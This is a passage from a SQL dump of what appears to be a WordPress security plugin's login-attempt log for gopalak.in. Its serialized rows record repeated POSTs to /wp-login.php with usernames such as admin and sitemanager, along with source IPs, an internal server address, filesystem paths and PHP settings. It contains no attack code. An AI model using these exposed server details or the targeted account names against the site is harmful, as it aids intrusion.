10:08:13'),(95252,3,'a:2:{s:8:\"username\";s:4:\"beta\";s:6:\"server\";a:34:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"108\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:11:\"HTTP_COOKIE\";s:100:\"wp-settings-time-1=1390368100; wordpress_test_cookie=WP+Cookie+check; bdshare_firstime=1388392036818\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:11:\"Mozilla/5.0\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"58360\";s:11:\"REMOTE_ADDR\";s:11:\"35.154.1.88\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"108\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746850459.544404;s:12:\"REQUEST_TIME\";i:1746850459;}}','35.154.1.88',1,'2025-05-10 09:44:21','2025-05-11 10:08:13'),(95253,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:34:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"115\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:11:\"HTTP_COOKIE\";s:100:\"wp-settings-time-1=1390368100; wordpress_test_cookie=WP+Cookie+check; bdshare_firstime=1388392036818\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:11:\"Mozilla/5.0\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"58356\";s:11:\"REMOTE_ADDR\";s:11:\"35.154.1.88\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"115\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746850459.547071;s:12:\"REQUEST_TIME\";i:1746850459;}}','35.154.1.88',1,'2025-05-10 09:44:21','2025-05-11 10:08:13'),(95254,4,'a:2:{s:8:\"username\";s:5:\"gamma\";s:6:\"server\";a:34:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"109\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:11:\"HTTP_COOKIE\";s:100:\"wp-settings-time-1=1390368100; wordpress_test_cookie=WP+Cookie+check; bdshare_firstime=1388392036818\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:11:\"Mozilla/5.0\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"58359\";s:11:\"REMOTE_ADDR\";s:11:\"35.154.1.88\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"109\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746850459.5444419;s:12:\"REQUEST_TIME\";i:1746850459;}}','35.154.1.88',1,'2025-05-10 09:44:21','2025-05-11 10:08:13'),(95255,2,'a:2:{s:8:\"username\";s:5:\"Alpha\";s:6:\"server\";a:34:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"109\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:11:\"HTTP_COOKIE\";s:100:\"wp-settings-time-1=1390368100; wordpress_test_cookie=WP+Cookie+check; bdshare_firstime=1388392036818\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:11:\"Mozilla/5.0\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"58357\";s:11:\"REMOTE_ADDR\";s:11:\"35.154.1.88\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"109\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746850459.544286;s:12:\"REQUEST_TIME\";i:1746850459;}}','35.154.1.88',1,'2025-05-10 09:44:21','2025-05-11 10:08:13'),(95256,0,'a:2:{s:8:\"username\";s:5:\"admin\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"nl-NL,nl;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:17:\"gzip, deflate, br\";s:11:\"HTTP_ACCEPT\";s:85:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.7\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"101\";s:15:\"HTTP_USER_AGENT\";s:117:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"37128\";s:11:\"REMOTE_ADDR\";s:15:\"220.158.234.201\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"101\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746850735.023838;s:12:\"REQUEST_TIME\";i:1746850735;}}','220.158.234.201',0,'2025-05-10 09:48:56','1970-01-01 00:00:00'),(95257,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:34:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"112\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:11:\"HTTP_COOKIE\";s:100:\"wp-settings-time-1=1390368100; wordpress_test_cookie=WP+Cookie+check; bdshare_firstime=1388392036818\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:11:\"Mozilla/5.0\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"63803\";s:11:\"REMOTE_ADDR\";s:11:\"35.154.1.88\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"112\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746851183.4986291;s:12:\"REQUEST_TIME\";i:1746851183;}}','35.154.1.88',1,'2025-05-10 09:56:25','2025-05-11 10:08:13'),(95258,3,'a:2:{s:8:\"username\";s:4:\"beta\";s:6:\"server\";a:34:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"105\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:11:\"HTTP_COOKIE\";s:100:\"wp-settings-time-1=1390368100; wordpress_test_cookie=WP+Cookie+check; bdshare_firstime=1388392036818\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:11:\"Mozilla/5.0\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"63810\";s:11:\"REMOTE_ADDR\";s:11:\"35.154.1.88\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"105\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746851183.495486;s:12:\"REQUEST_TIME\";i:1746851183;}}','35.154.1.88',1,'2025-05-10 09:56:25','2025-05-11 10:08:13'),(95259,4,'a:2:{s:8:\"username\";s:5:\"gamma\";s:6:\"server\";a:34:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"106\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:11:\"HTTP_COOKIE\";s:100:\"wp-settings-time-1=1390368100; wordpress_test_cookie=WP+Cookie+check; bdshare_firstime=1388392036818\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:11:\"Mozilla/5.0\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"63813\";s:11:\"REMOTE_ADDR\";s:11:\"35.154.1.88\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"106\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746851183.50263;s:12:\"REQUEST_TIME\";i:1746851183;}}','35.154.1.88',1,'2025-05-10 09:56:25','2025-05-11 10:08:13'),(95260,2,'a:2:{s:8:\"username\";s:5:\"Alpha\";s:6:\"server\";a:34:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"106\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:11:\"HTTP_COOKIE\";s:100:\"wp-settings-time-1=1390368100; wordpress_test_cookie=WP+Cookie+check; bdshare_firstime=1388392036818\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:11:\"Mozilla/5.0\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"63807\";s:11:\"REMOTE_ADDR\";s:11:\"35.154.1.88\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"106\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746851183.4954641;s:12:\"REQUEST_TIME\";i:1746851183;}}','35.154.1.88',1,'2025-05-10 09:56:25','2025-05-11 10:08:13'),(95261,5,'a:2:{s:8:\"username\";s:7:\"mercury\";s:6:\"server\";a:34:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"108\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:11:\"HTTP_COOKIE\";s:100:\"wp-settings-time-1=1390368100; wordpress_test_cookie=WP+Cookie+check; bdshare_firstime=1388392036818\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:11:\"Mozilla/5.0\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"63816\";s:11:\"REMOTE_ADDR\";s:11:\"35.154.1.88\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"108\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746851185.1894169;s:12:\"REQUEST_TIME\";i:1746851185;}}','35.154.1.88',1,'2025-05-10 09:56:26','2025-05-11 10:08:13'),(95262,0,'a:2:{s:8:\"username\";s:5:\"admin\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"fr-FR,fr;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:14:\"gzip, zstd, br\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.9\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"100\";s:15:\"HTTP_USER_AGENT\";s:122:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.134 Safari/537.36\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"57440\";s:11:\"REMOTE_ADDR\";s:14:\"103.163.214.43\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"100\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746851360.5216329;s:12:\"REQUEST_TIME\";i:1746851360;}}','103.163.214.43',0,'2025-05-10 09:59:22','1970-01-01 00:00:00'),(95263,3,'a:2:{s:8:\"username\";s:4:\"beta\";s:6:\"server\";a:34:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"112\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:11:\"HTTP_COOKIE\";s:100:\"wp-settings-time-1=1390368100; wordpress_test_cookie=WP+Cookie+check; bdshare_firstime=1388392036818\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:11:\"Mozilla/5.0\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"61542\";s:11:\"REMOTE_ADDR\";s:11:\"35.154.1.88\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"112\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s: